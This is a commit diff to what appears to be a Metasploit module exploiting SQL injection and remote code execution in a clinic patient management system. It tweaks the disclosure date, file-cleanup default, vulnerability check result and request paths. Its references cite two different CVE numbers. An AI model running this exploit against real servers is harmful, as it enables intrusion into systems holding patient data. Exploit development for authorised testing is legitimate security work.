Addressing comments

msutovsky-r7 · msutovsky-r7 · commit 41b35fb3334a · 2025-05-15T16:48:48.000+02:00
diff --git a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
           ['CVE', '2025-3096'],
           ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
         ],
-        'DisclosureDate' => '2021-10-21',
+        'DisclosureDate' => '2021-01-04',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -44,28 +44,28 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
-      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false])
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
     ])
   end
 
   def check
     print_status('Checking if target is vulnerable...')
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'GET'
     })
 
     return Exploit::CheckCode::Unknown('Unexpected response code from server') unless res&.code == 200
     return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
     return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")
 
-    return Exploit::CheckCode::Vulnerable('Clinic PMS detected')
+    return Exploit::CheckCode::Appears('Clinic PMS detected')
   end
 
   def login_sqli
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/index.php'),
+      'uri' => normalize_uri(target_uri.path + 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_post' =>
@@ -137,7 +137,7 @@ def upload_payload
 
   def logout
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/logout.php'),
+      'uri' => normalize_uri(target_uri.path + 'logout.php'),
       'method' => 'GET'
     })
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
